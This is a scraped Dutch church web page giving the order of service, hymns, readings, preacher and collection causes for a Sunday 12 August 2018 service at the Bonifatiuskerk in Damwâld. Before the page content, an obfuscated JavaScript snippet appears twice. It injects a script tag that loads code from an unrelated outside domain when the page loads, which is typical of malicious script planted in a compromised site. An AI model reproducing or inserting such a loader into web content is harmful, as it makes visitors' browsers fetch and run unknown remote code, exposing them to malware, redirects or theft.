;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 12 augustus 2018 14:00 uur - PKN Damwâld
zondag 12 augustus 2018
14:00 uur

Kerkdienst zondag 12 augustus 2018 14:00 uur

Informatie

Voorganger:Dhr. G. Visser, Wâlterswâld
Organist:Jelte Cuperus
Liturgie
Lied voor de dienst Gezang 295
Welkom
Beginlied ELB 240: 1 en 4 (melodie ps. 119)
2. Stil Gebed, Bemoediging en groet
We zingen: Psalm 25: 4 en 6
4. Gebed om de Heilige Geest
We zingen: Psalm 107: 20
We lezen: Ex 32: 1 – 20 + Lucas 12: 35-37 Matt 22: 35 – 40
We zingen: ELB 186a: 1, 2 en 3
Preek .
We zingen: ELB 189b: 2, 3 en 4
Gebed en Voorbede
Collecte
Slotlied Gez. 255: 1, 2, 3 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Stichting Ora

Sinds de oprichting in 1982 is de visie van de Stichting ORA om mensen in nood wereldwijd te ondersteunen met geestelijke, sociale, materiële en praktische hulp, met als kerntaak hulp aan gezinnen in Oost-Europa, Azië en Afrika. In principe helpt de Stichting ORA mensen ongeacht hun ras, sekse of geloof, maar wanneer Christenen om hun geloofsovertuiging worden vervolgd zal de Stichting ORA hen in het bijzonder ondersteunen.

Tweede collecte: Kerk
Uitganscollecte: Kerk